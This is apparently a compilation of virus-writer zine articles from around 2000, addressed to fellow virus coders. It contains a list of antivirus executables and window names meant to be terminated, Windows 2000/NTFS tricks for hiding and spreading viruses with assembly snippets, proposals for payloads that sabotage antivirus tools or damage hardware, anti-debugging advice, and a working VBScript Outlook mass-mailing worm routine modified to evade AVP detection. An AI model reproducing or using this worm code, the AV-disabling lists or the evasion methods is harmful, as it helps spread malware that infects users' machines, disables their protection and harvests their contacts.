is maybe the fastest and most efficient way of spreading, cause the snowball
effect is very huge. But if you use VBS and Outlook, please keep in mind that it
is worse enough that your virus just spreads in one OS, if it also relies on
two frontends ( OE and VB Scripting Host ) it becomes even worse ;)
Hope this little text helps at least some peoples, I enjoyed writing it, and hope
you do so too while reading it... ;)
cu SnakeByte
AV-List 13.07.2000 ( by SnakeByte [ SnakeByte@kryptocrew.de] )
What is the problem when using anti-AV tricks in a Virus ? The most of those
you find in tutorials are simply outdated ( Think of the f-prot loop trick, which
is still used ;) But in windows you have more possibilitys to get rid of the AV's
You can stop the execution of files ( under win9x and 2k ), you can delete files,
you can prevent files from being executed ( if you're ring-0 ) and you can
close windows of other applications. So on this little list you find all you need for this.
I looked for such a list because I wanted to know which files are used by
AV's and which windows we should close to disable them ! But i found none,
luck for you :
Now I got a CD in my hands with several Shareware AV's and I collected several
others on the net ( god i love this flatrate ;) So I took myself some spare
time and made this little listing.
I just have Win95 so I can just give information about the Win9x Versions.
If you have another Version of a program, which is listed here, installed or
informations about a program which is not listened here, please contact me,
so I can expand this list and keep it actual.
**************************************************************
Anti-Viral Toolkit Pro ( AVP )
Files:
*.avc Virus Database
( The Normal EXE Files seem to start the _ ones )
_avp32.exe AVP Avtiviral scaner shell
_avpcc.exe AVP Control Centre Application
_avpm.exe AVP Monitor
avp32.exe AVP Scanner ( Main File )
avpcc.exe AVP Control Centre Application
avpm.exe AVP Monitor
avpdos32.exe AVP Scanner for DOS
avptc32.exe AVP Scanner for DOS
exec.exe unknown
avpupd.exe AVP Update ( leeches new *.avc files )
Window-Names:
AVP Monitor
AntiViral Toolkit Pro
AVP Updates
**************************************************************
AntiVir 9x
Files:
Antivir.vdf Virus Database
AVE32.exe Scanner ( DOS )
Avgctrl.exe Monitor
Avnt.exe Scanner ( DOS )
Avrep32.exe Report Viewer
AVSCHED32.exe Scan Scheduler
AVWIN95.exe Scanner
Avwupd32.exe Update
Windows:
H+BEDV AntiVir Guard/9x
AVWUPD32
**************************************************************
Dr. Solomon Virus Scan
Files:
scan.dat Virus Database ( assumed )
AVConsol.exe Scheduler
Bootscan.exe MBR-Scanner ( DOS )
ECEngine.exe Download Engine
FindViru.exe Scanner ( DOS )
scan32.exe Scanner
scrscan.exe ScreenSaver + Scanner
VSCAN40.exe Desktop for the Scanner
vshwin32.exe Monitor
Webscanx.exe Webscanner
Windows:
vsstat
Avconsol
Webscanx
Vshwin
**************************************************************
F-Prot for WIndows
Files:
*.def Virus Database
Expert.exe Help & Information ( DOS )
FP-Win.exe Scanner
f-stopw.exe Monitor
Vir-help.exe Help-File ( DOS )
Windows:
FP-WIN
F-PROT für Windows ( German Version )
F-STOPW Version 5.06c
**************************************************************
F-Prot 3.07B
Files:
*.def Virus Database
F-prot.exe Scanner ( DOS )
**************************************************************
F-Secure Anti-Virus for Windows 95
Files:
*.avc Virus Database ( uses same as AVP ! )
DVP95.exe F-Secure Gatekeeper
DVP95_0.exe F-Secure Gatekeeper
F-agnt95.exe F-Agent
F-prot95.exe F-Secure Anti-Virus Launcher
Windows:
F-Secure Anti-Virus for Windows 95
F-Secure Anti-Virus
F-agnt95
Dvp95
**************************************************************
G-Data AntiVirenKit ( German Program )
Files:
*.avc Virus Database ( Same as AVP ! )
AvkServ.exe Scan Server
AckWin32.exe Scanner
notstart.exe creates Bootdisks
Windows:
AntiVirenKit 9
**************************************************************
InoculateIT Personal Edition:
Files:
Vet95.exe Scanner
VetTray.exe Monitor
AutoDown.exe Update
Rescue.exe Dos-Scanner
Window-Names:
InoculateIT Personal Edition
InoculateIT Real-Time Protection Status
vettray
AutoDownload
**************************************************************
Norman Virus Control Win 9x
Files:
Claw95.exe Monitor
Claw95cf.exe Configures Monitor
Normist.exe Smart Behaviour Blocker
Nvc95.exe Scanner
Nupgrade.exe Internet Upgrade
NVCbin.def Virus Database
NVCMacro.def Virus Database
Windows:
Norman Virus Control for Windows 95/98
Cat's Claw v4.80
**************************************************************
Norton Anti Virus ( NAV )
Files:
navapw32.exe Monitor
NavLu32.exe Update
Navw32.exe Scanner
Windows:
navpw32
Norton AntiVirus
**************************************************************
Sophos Anti-Virus for Win95:
Files:
VDL.dat Virus Database ( assumed )
Sweep95.exe Scanner
Window-Names:
Sophos Anti-Virus - SWEEP
**************************************************************
Trend PC-Cillin 98
Files:
IOMon98.exe Monitor
PCCWin98.exe Scanner
Windows:
Trend PC-cillin 98
Iomon98
**************************************************************
RAV 7
Files:
*.vdm Virus Database
Jedi.exe Scan Scheduler
Monitor.exe Monitor
rav7win.exe Scanner
rav7.exe Scanner ( DOS )
##############################################################
Are Anti-Virus Companies Criminals?
SnakeByte
Hi, maybe you start wondering about this headline, but I will tell you some facts which
brought me to this question ;)
The first thing is, that in several countries there is a law against the ownership of viral
sourcecodes and binaries. But this also includes, that it is forbidden to share these
things. What do AV'ers do ? They share their files so they all are able to include common
viruses into the databases. In addition to this, they have a lot of viral binaries and
disassemblys in their labs, to analyze viruses.
The next fact is not related to a country-specific law, but to international copyright. Most
of the software for MS-DOS and Windows ( which are the favourite platforms for viruses ), is
commercial. What does this mean ? You got to pay for the software you use. If you copy it
completely or parts of it, whithout paying for the code, you break international copyright
laws. Heh, what does Kasperski and the others ask me for ? I shall send them files which I
suspect to be infected ? I can't believe this, they ask me to commit a crime ! I don't know
how other countries handle this, but here in germany if you make another person commit a
crime it is nearly as worse as committing the crime on your own.
Last time I installed something commercial on my PC, I was so bored, that I read the
disclaimer ( you know the window with lots of text you normally just see for a short time,
cause you directly press >next< ). I was wondering when I saw the little paragraph about
reverse engineering. If you own this program, you agree to the terms, that you will never
ever reverse this program. ( If you don't own the program you break the copyright I talked
few lines above about *g* ). Heh, how do the Anti-Virus researchers analyze viruses ? They
reverse the virus, to get knownlegde about how the virus works. Whoah, to do this, they also
need to disasm the infected program. Another law they break. I really don't think that they
just start the file to infect some goats, if they would, they get in danger that new
hardware attacks destroy their systems ;)
Another thing is that several Anti-Virus Companies start to work on Scanners, which work on
mail-servers to stop outgoing viruses. The mail will not be delivered. Due to the fact, that
a most virus scanners can scan compressed files and so on, there is no easy way for a normal
user to send a virus to his favourite AV Company, if the webserver he uses has one of these
scanners running and the scanner has the virus inside its database. Ok, why is this so
criminal ? They exclude smaller AV-Companies by this from the market. I for myself write a
simple, free Anti-Trojan Tool. How should I receive submissions from peoples which want tu
support my work ? It is impossible and therefore I can not longer work on my product. By
this, they use their nearly-monopol like place to get rid of concurrents. This is illegal,
as you see on the current proceedings against Microsoft.
What if we consider viruses to be an art ? In a way the author created something unique,
which may be assumed to be an artwork like a book or a painting ( If you look at abstract
artwork, nearly everything may be considered to be art *g* ) What about the destruction of
art ? Nearly everywhere this is illegal or at least against the ethics ( Just think about
the burning of books by the germans during the WW2 ) So this might be another crime they
commit.
What if we would place a copyright in our software ? Something like: "You can freely
distribute this program, as long as you do not change anything. Disassembling and the
forwarding to the Anti-Virus Community is forbidden. This program is protected by
international law. It is just meant for analyzing artificial intelligence on controlled
environments. It is also strictly forbidden to place this program on a non controlled
environment and place it into the wild.. bla bla" Just use their laws, to forbid them
analysing our creations. If you see the virus in a AV-Database you know they have broken
this law and you can take them to the court... ;)
1. Introduction
I just wanted to write an article about NTFS5. But I am reading a lot of
documentation about Win2k and I found there many functions and sequences that
could be very usefull for us, virus coders. So i decided to write some tipz
and trix that anybody could use. I hope I succeeded.
btw It's my first english written article so pls be patient. My english sux
so if you don't know what something means, just contact me.
And now we can begin ...
2. NTFS5
I think you all expected this:) And i also read on virus.cyberspace.sk that
english version of my article for Igi is requested. I won't exactly translate
what i wrote there becoz it wasn't for coders. This will be :)
2.1. Streams
Streams is not a new feature of NTFS5 and it was implemented in NTFS since the
very beginning of WinNT(version 3.1) but it has been downplayed by Micro$oft.
In Win2k the position of Streams is much better. And there also exists the first
virus that uses Streams. It's of course mine and Benny's/29a Win2k.Stream. I
think ya all have heard about it becoz of big medial success. It's an very easy
and simple virus with a good idea I think. First we heard about Streams from a
man called GriYo/29a (heya and thx man!) on meeting in Brno. And then when Benny
came to me for some days we decided to write our first common virus (and my
first). It was really funny becoz we coded through the nite and very lately we
didn't even know what we are typing :) There also existed a version of
Win2k.Stream with polymorfic name of stream! But next day when we woke up and
talked about it in the pub we decided to write it as simple as possible. And I
think we succeeded - the comment is longer than the whole code XD.
First we'll look what Streams exactly are and then we'll talk more about our
virus.
On filesystems such as FAT, FAT32 and others exists only one unnamed stream.
What do ya think it is? Exactly! The file alone. But on NTFS there exist also
others (data) streams with a name. The name begins with ':' to indicate that it's
a named stream (part of file) and pastes together with filename (the unnamed
stream). Look at this:
We have a file file.txt. It is also the unnmed stream. We would like to create
a new stream within the file file.txt. We want to name it "RAT" for example. So
we simply add ':' before stream name and paste it to file name. So now we have
somewhere in the buffer this: "file.txt:RAT". And now there's nothing easier than
just use CreateFile(A|W) to create our stream. If creation succeed you will
get a handle that you can uses as it would be a normal file (it is exactly a normal
file ...).
Well we have a stream within the file but we forgot its name :) Any solution?
Yeah there is one. It's not so comfortable as it should be but there is. For
our needs we'll need a function called BackupRead that can be found in
kernel32.dll.
BOOL BackupRead(
HANDLE hFile, // handle to file or directory
LPBYTE lpBuffer, // read buffer
DWORD nNumberOfBytesToRead, // number of bytes to read
LPDWORD lpNumberOfBytesRead, // number of bytes read
BOOL bAbort, // termination type
BOOL bProcessSecurity, // process security options
LPVOID *lpContext // context information
);
For our purposes we can ignore such thingiez as security and context. hFile is
handle to file we want to enumerate streams. lpBuffer should point to a structure
called WIN32_STREAM_ID.
WIN32_STREAM_ID struc
DWORD dwStreamId;
DWORD dwStreamAttributes;
QWORD Size;
DWORD dwStreamNameSize;
WCHAR cStreamName[ANYSIZE_ARRAY];
WIN32_STREAM_ID ends
The first bytes of this structure represent the header of each stream. Then
begins the name of the stream and after the name there is the content of stream.
To enumerate all the streams, you just need to loop until BackupRead returns
False. Just look at the code snippet:
Well i think that this is all you should know about streams for the beginning.
Just make some more coding with it and i think you will become more familiar
with it and you will use it in the future. Remember the words from Kaspersky/AVP:
Stream companion is a new breaktrough infection which is very hard to detect!
Just make some more wrinkles to AVers ...
2.1.1. Win2k.Stream
And now something more about our babe. After the execution tries to find via
FindFirst&FindNextFile find victimz to infect. It infectz only *.exe files in
current directory (there were no reasons to spread it). The infection worx as
follows:
so after infection the file loox as this: (This are pictures from AVP :))
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³
³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°° :STR °°°°°°°³
³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
³±±service streams±±³ ³±±service streams±±³
³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
then it tries to find next file etc. At the end it just runs via CreateProcess
the <victim_file>:STR stream where is victim_body. When the victim ends it just
invokes ExitProcess and ends. If any error occures it displays following text:
and ends. This is also a payload on FAT, FAT32 and others filesystems that do
not support streams. And that's all. Simple ain't it?
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to file
FSCTL_GET_COMPRESSION, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
(LPVOID) lpOutBuffer, // output buffer
(DWORD) nOutBufferSize, // size of output buffer
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);
I think that it is clear. And also simple to implement to your virus. Just do it!
BOOL EncryptFile(
LPCTSTR lpFileName // file name
);
BOOL DecryptFile(
LPCTSTR lpFileName, // file name
DWORD dwReserved // reserved; must be zero
);
I think i'm repeating myself but - easy to implement, easy to use ...
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_SPARSE, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);
push 0
push 0
push CREATE_ALWAYS
push 0 ; create file SparseFile
push 0
push GENERIC_WRITE
@pushsz "SparseFile"
call CreateFileA
xchg eax, ebx
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push eax
push eax ; Sign this file as a SparseFile
push FSCTL_SET_SPARSE
push ebx
call DeviceIoControl
push FILE_BEGIN
@pushvar <dd 8>
push 0 ; Move filepointer to 32GigaBytes
push ebx ; (hyea Gig :))
call SetFilePointer
push ebx ; SetEndOfFile ==
call SetEndOfFile ; fill with nulls to 32 gigz
push ebx
call CloseHandle
This code snippet will create a file which size is 32GB! But acutally the real
size is null :) Nice aint it ? And how to let the filesystem know that we have
sparse in our file? Here's a prototype of function that we can use ...
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_ZERO_DATA, // dwIoControlCode operation
(LPVOID) lpInBuffer, // pointer to FILE_ZERO_DATA_INFORMATION
(DWORD) nInBufferSize, // size of input buffer
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
2.4. Mounting
To this theme is not so much to say. I think that most of ya know mounting from
various *nix systems such as Linux. If you want to set a volume point you will
need 3 functions.
That's all for now about NTFS5. There's more to say in each of that themes I
was talking about in this article but i think it is enough for the beginning.
Just code and study and if you will have problems contact me. If I can help
you (==if I will know it) I will help you.
First you must create a job object. This can be done via CreateJobObject api fc.
HANDLE CreateJobObject(
LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (can be null for our purposes)
LPCTSTR lpName // job name (if null then job is
); // a noname job :))
So now we have created a job and we have handle for it. Now we must assign some
process to it. Just use AssignProcessToJobObject ...
BOOL AssignProcessToJobObject(
HANDLE hJob, // handle to job
HANDLE hProcess // handle to process
);
Easy. Now we can place some restrictions to the processes within the job but
that's not so necessary for now. I promised terminating of all processes via one
api fc rite? Here it is ...
BOOL TerminateJobObject(
HANDLE hJob, // handle to job
UINT uExitCode // exit code
);
After calling this function with rite job handle will be all processes within
the job terminated.
4. Otherz
- in Win2k Toolhelp32 library is implemented. You can again use fc as
CreateToolhelp32Snapshot, Process32First etc. It is very usefull when
writing for Win9x and Win2k a per(multi)-process residency. In WinNT you
can use only EnumProcesses and EnumProcessModules from psapi until now.
These two functions weren't in Win9x so there were double code in viruses
for both operating systems.
- for easier access to registry you can use functions from Shell Light Weight
API (shlwapi.dll). These functions are:
SHDeleteEmptyKey
SHDeleteKey
SHDeleteValue
SHGetValue
SHSetValue
SHQueryValueEx
SHEnumKeyEx
SHEnumValue
SHQueryInfoKey
SHRegGetBoolIUSValue
e.g. to read a subkey, you had to open registry subkey, call RegQueryValueEx
and then close the registry key. SHGetValue does everything in one step.
- when you are infecting a file check it with SFCIsFileProtected which will tell
you whether the file is protected or not. (I'm writing an article about how to
fuck SFP and then it will be easier :))
- if you want to go to some system directories such as system32 etc. use
fc ExpandEnvironmentStrings which let you use environment variables. E.g.
until now you had to get windows directory and then paste system32. But now
you just use %system32% environment variable which you pass to Expand ... that
will return expanded path.
DWORD ExpandEnvironmentStrings(
LPCTSTR lpSrc, // string with environment variables
LPTSTR lpDst, // string with expanded strings
DWORD nSize // maximum characters in expanded string
);
5. End
I need rest !!!
If you aren't crazy after reading this article then you are not normal :)
For such people a little song:
Do you know who sings this? It's my beloved song from my beloved group. If
you know name of that group tell it to me on #virus and you will get a prize.
(well still dunno what the prize will look like but you will :))
And that's all for now ... If you'll find any errors just contact me pls.
Thx for reading!
Kalkin/EViL
These are difficult times for us, virus writers. No, I don't mean the cops, society or the
press. I mean the process of writing a virus. Yes, there are tons of materials about this
subject and quite some people who can help, but that's usually by a technical problems. What
if you want to do something radically new? It's actually not so easy coz everything has
already been done: polymorphic macroviruses, ACCESS infection, LINUX-viruses. You can
realize some parts of the virus in a never-seen-before way, but these parts are mainly only
some solutions to some x technical problems. But you want to do something NEW and
INTERESTING, something like the spying virus from CodeBreakers or the payload of CIH. Maybe
this article will help you.
Maybe this has already been done, but I haven't heard about it (on the other hand, I'm not
too informed about what goes on in the scene). Anyway, if it's so then the credit goes to
the one who had this idea.
Like you all know .LNKs are small link files, so called shortcuts, that were presented with
Windows 95 (in Microsoft's OS world) and should eliminate the need to copy one program into
several folders. .PIFs are basically the same, just they also contain usefull loading
information and are for DOS programs. Both formats contain the path of the original program.
It wouldn't be hard to replace this path with the path to our infected file, which would
execute after it's actions the real program. This would be like some kind of companion
virus. It would be even better, coz how many AV programs check for changes in .LNK/.PIF
files? Another plus is that this infecting method basically works on every OS where are
.LNKs (LINUX for example). The only problem is that a virus which uses just this method of
infecting won't spread to any other computer (it will "travel" only if somebody for some x
reason copys our file to another PC). But this method can be used to increase the change of
executing the virus, especially in the case of runtime viruses.
Alias "infection"
This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and *NIX
systems (I think). A virus could set some aliases to itself and after infecting some files
execute the original program.
Name changing What if a DOS virus hooks INT 21h, saves and then changes the name (set by
exec, found by findfirstfile) to the name of an infected file (in memory)? The infected file
would be executed, copied to disk, included in a ZIP archive. If the proper code is included
then this viralized item wouldn'd be opend for editing (the real one would). The same could
do a WIN virus. And this method is better for spreading than the above two.
This idea was originally by MiKE The Hacker/TPT Gang and describes a hybrid virus, that
infects formatting programs and modifies them so that they put the same virus on the
bootsector of formatted disk. This would be better then just a bootsector-infector, coz you
can't get rid of the virus by re-formatting the disk (atleast with this formatter). Reboot
won't help eighter. This idea can be enhanced: infecting of CD writing programs, so that an
AUTORUN.INF and an infected file would be written to CD. It should be a little bit easier
(no need for a hybrid virus) and also better, coz there's no way you can get rid of the
virus on CD (unless you're burning CD-RWs). Disadvanages: not too few formatting/CD-burning
programs exist.
I came to this idea when I was surfing through Ralf Browns Interrupt List. There's written,
that by using interrupt 15h and seting AX to D042h it's possible to install a microcode
patch into the Pentium Pro processor. I haven't checked this and have no idea how much can
the patch effect the CPU, so I don't know if the proper code will really fuck the processor
or will it do nothing. It's too bad that there aren't so many Pentium Pros around, coz there
seems to be CIH potetial.
"Collection" viruses
This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what it is then:
it outputted a polymorphing virus on an Internet worm that contained SMTP engine. A so
called collection-virus is a virus (or worm) that contains several (let's say 5) viruses
which will be released in a random order.
"Part-upgrading" viruses
Those viruses would have a "serial number" about every part of itself: the procedure of
finding files, polymorphing engine, infecting part. When now such a virus would "meet"
another part-upgrading-virus, it would check all serial numbers and if some of them are
newer than it's own, it would copy the updated procedure to itself. But when it finds a part
that it doesn't have then the virus would copy the part to itself and add a call or jump to
it. So basically those viruses expand themselves. A direct action COM infector could for
example add to itself parts to go TSR and infect EXEs.
Quotating viruses
It's a lame and not new idea. Such a virus would as payload display quotations of some
famous person. For example Sokrates's. The good thing is that there are MANY people who have
said something (I never said it should be something smart or meaningfull).
Intro/demo viruses
I don't mean here product demos, but graphics demos like they are presented on demo-parties
and compos (check http://www.hornet.org to get the picture). Intro-viruses would play such
videoeffects as payload. Advantages: usually small size, nice, different (what do you think,
will people remember better a lame textmode "Infecto-ViruZ" in black and white or a
"IntroVirus" in 24 bit colours companioned by breath-taking-beautiful moving clouds?)
Most viruses today have retro abillities, but I'm talking about a virus, that is specially
coded to destroy anti-virus programs. It would turn off resident AV monitors, install
troyans in anti-viruses (*.AVC and TBSCAN.DEF infection). It would also overwrite part of AV
programs by installing itself in them and then simulate that the AV scans. There are several
viruses that patched the "File system" status on TbScan's output to hide the fact that it
suddenly used DOS services to read the disk. A SAAV virus would for example execute the
graphics procedure to display message "Scanning for known viruses in memory" by F-Prot/DOS
but then just wait for some time. It would use the necessary procedure to bring up the
scanning window, display filenames and instead of checking infect them. Or for example
display "Checking partition table" by ThunderByte Partition (created by TbUtil) and check
nothing. It could be like the real AIDS, which doesn't kill, it just destroys the immunity
system and makes the way free for other deseases. It doesn't take much code to do so, just
some small patches. The problem is how the virus finds what to patch coz AV companies would
change the inner structure of the program with every new version. At this moment the fact,
that most AV programs don't let to encrypt/compress themselves (coz of the CRC check), comes
real handy.
Simulating viruses
Based on the above idea these viruses would install themselves in some specific programs and
then simulate. One example could be PGP (so that the signature is always GOOD, and goodbye
to trustfull software). It could also be one virus that patches several products.
"Expensive" viruses
It's actually a image of what happened here in Estonia: quite some Internet users recived a
file called Estonia.Exe This was a SFX ZIP and contained a client program for some
sex-server. Anyway, after executing the program did also some other things and as a result
the PC began to connect to Net through a Malaysian (if I remember correctly) server, which
had quite high prices. Nobody knew it and everyone was REALLY surprised when in the end of
the month the telephone bill was HUGE. There were talks that this was a virus, but most
(including specialists) don't think so. It seems that it was just a troyan. But, this idea
can be used in viruses (a good way to compromize the lamest ISP near you).
As last a destructive payload from KUTT/TPT Gang. The idea is based on the fact that
speakers may get damaged when the music is too loud. KUTT though that it would be
interesting if a virus did that to PC-speaker: generate a high and loud sound and play it
quite some time. It's probably technically impossible to realize, but who knows? An enhanced
version of this idea is to damage the speakers that are connected to the sound card. This
should actually be more realistic, coz usually the hardware of a sound card is capable of
that and the speakers aren't made for this situation.
The protector scene
Kalkin/EViL
There are many sub-cultures in the computer world: hackers, demo-coders, musicians,
graphicans, virusauthors, crackers. And there's also a not so well knows scene: the
protector-scene. It mostly consists of crackers. So what do these protector guys do? They
research ways how to defeat debuggers/code analyzers/emulators/disassemblers and write
programs that use these ways to protect COM and EXE files. Why am I telling this? Because
there's been quite some talk about anti-byte techniques, the advantages of slow polymorphism
and other ways to make the detecting and/or disinfecting of virus harder. But almost nothing
has been said about anti-debug tricks, even if those are REALLY important. Already in number
4 (or was it number 6?) of 40hex was an article about ADcode. Samples there were for
confusing the reading of code. But the methods have involved FAR beyond that. Nowadays the
protecting part uses stack tricks to crash debuggers, changes between protected and real
mode, checks memory, calculates checksums, debugs and emulates it self, relocates the code
in memory, opens the original file and checks it for changes. The protectors contain
polymorphic engines (I've seen all better known MTEs in them: TPE, ViCE, MtE, DAME, etc.).
They have become really powerfull. But they still resemble to viruses: become executed
first, do their stuff, clean up, execute the real program. Some of these protectors are
REALLY hard to crack, even really good crackers have a problem with them. I come to the
point now: what do you think, how many really good crackers are there among AVers? Sure,
they know debuggers and dissemblers, but that's not enough to be a good cracker. What now if
some hard AD code, so hard that even the best crackers have problems with it, has been used
in your virus? Wouldn't the AVer, who gets a sample of it, have some sad times, sitting up
all night and trying to decrypt the virii? But how can a viruswriter get this kind of code?
For our luck, exactly like in viral business, there are many sourcecodes available. And
there's also an another reason why to check protectors: quite a lot of them check the
executable for changes. It's no problem when your virus is resident and has stealth
capabillities, but if you coded a runtime virii then you're fucked. This can be changed by
adding code that prevents the virii from infecting protected files. Ofcourse there's a third
reason: use the encryption routines of a protector for crypting the virus. Or you can
encrypt the file with this code and insert another decryptor, which decrypts your virii,
into the main decryptor. The main coal is that AVP for example (seems to be the AV which can
unpack the most executable compressors and decryptors) scans the file (finds no viral
infection), finds the protector, unpacks it, scans the unprotected file (and finds again no
virus). A (possilbly) good example of the code produced by the protector scene are EliCZ
device drivers - ExDs. They are VxDs that are executed in DOS, work their way up to ring0
and stay there. Plus points: undetectable (or that's atleast what EliCZ claims). Why can't
we use this technology in our virii? But check out the things yourself. You just need access
to Internet and the following address: http://www.suddendischarge.com
Katja Kladnik (Lucky Lady)
Richard Karsmakers
Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady
that contacted me about 18 months ago for the first time. She has occurred in various
installations of the ST NEWS virus column.
As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus
Killer", which had in some way caused her to start a kind of 'competition' with her
designing and spreading computer viruses and me trying to find and kill them. She sent me
each of her creations so that I could update the "Ultimate Virus Killer" recognition
algorithms. Although I certainly didnt't approve of all these things she did nor the way she
involved me in it, all I could do was play along with the game. I couldn't contact her in
return, because she always sent her packages anonymously.
As 1994 was coming to its close, it became apparent that she had left the Atari community
and was now concentrating more on the PC side of things. Also, quite suddenly she contacted
me via electronic mail. Though I still didn't know her name, I could now at least send
messages back to her. Especially with her having left the Atari virus creation scene,
something happened which I had not considered possible: Our email messages became more
casual and even personal.
Gradually I found our that her real name was Katja Kladnik, who had lost her parents in the
Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster
parents and studied pyschology at the University of Ljubljana, the capital of Slovenia. She
was - I know this may sound strange to some of you, especially those struck by any of the
viruses she has created - a really fascinating person who had a lot of hidden depths to her
personality. We exchanged email messages with quite some regularity, usually involving
topics like music, culture and, occasionally, viruses. I always wondered why she had found
it so challenging to create computer viruses and start this semi- friendly "virus war" with
me, a question that she could never really reply to satisfactorily.
Around spring of this year I noticed her messages getting increasingly gloomy and
depressing. She even said, at several occasions, that she wouldn't mind being dead or
something. I never knew what triggered this doom and gloom, though it might have been her
boyfriend leaving her some time earlier. There was nothing I could do about it, either.
Believe me, I tried.
When I emailed to her to ask how she was doing, somewhere around the middle of June, I got a
message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja
had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most
likely. She was 22.
Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something
like an enemy, in the course of our correspondence she had become a kind of friend.
Especially after she had left the Atari scene, we opened up to each other and I no longer
felt that being in contact with her was in some way morally incorrect what with my being a
virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or
two months she was to me not a virus coder at all, but instead a sad young woman that needed
attention and love badly.
Katja, despite the fact that we started off on a really wrong foot, you will be on my mind
always; not as a virus coder but as the enchanting and fascinating friend that you gradually
became.
In one of the last Updates, the Avp antivirus has added a detection for i-Worms that uses the
Outlook replication method, used in almost all the Vbs and Js worms, Like the I Love you,
Bubbleboy and all of them.
Ok, this will made your I-worm undetectable for avp till they add it to the database; i'm
pretty sure that if in your worm you use Outlook replication you use this code, or one
similar:
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---
The only thing that you should do is add one line and change another, like here (lines with *
are the modified ones):
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
AddlistCount = AddList.AddressEntries.Count *
For AddListCount = 1 To AddlistCount *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---
You should delete the "*" if you want the worm to work.
I think that if you know something about I-Worms you should understood what i did; i just
create a new variable, AddlistCount , and make it be like the number of addressentries, and
then i use that new variable in the next line.
What is a Retro-virus?
-------------------------
You remember reading that a good emulator will save it's place when it
finds a decision-based jump? That way, if the code does a check of something
and then quits if the condition is met, the emulator can just go back and
pretend the condition wasn't met and see what it can find down the other
branch of the program. This is to defeat the technique of quitting when
finding an emulator. How about we stop that? How about we do our
anti-emulation bit and then test it, but if we're being emulated instead of
just quitting, we crash the program? Or better still, if we're on a pentium,
why not just hang the machine? It's what the 'foof' bug is there for :) If the
machine hangs, the antivirus program has no chance to return to the jump and
try the other branch and the user will probably not bother scanning it again.
If he does, the same thing will happen again and again, the user will never
get a complete scan. Here's a rough guide to the code needed, assuming that
you have in place a suitable emulation-detection routine:
How many end users are going to restart the computer and try scanning that
file again when the last time it hung the computer? In the Microsoft age of
idiot-friendly operating systems, not many. If they don't know what's going on
and the machine hangs, they just won't do it again. If they do once, they
won't twice. Take the virus hoax emails that constantly do the rounds, most
people know better to respond and forward the mail, but the fact that they
carry on spreading shows just how many idiots there are out there who are
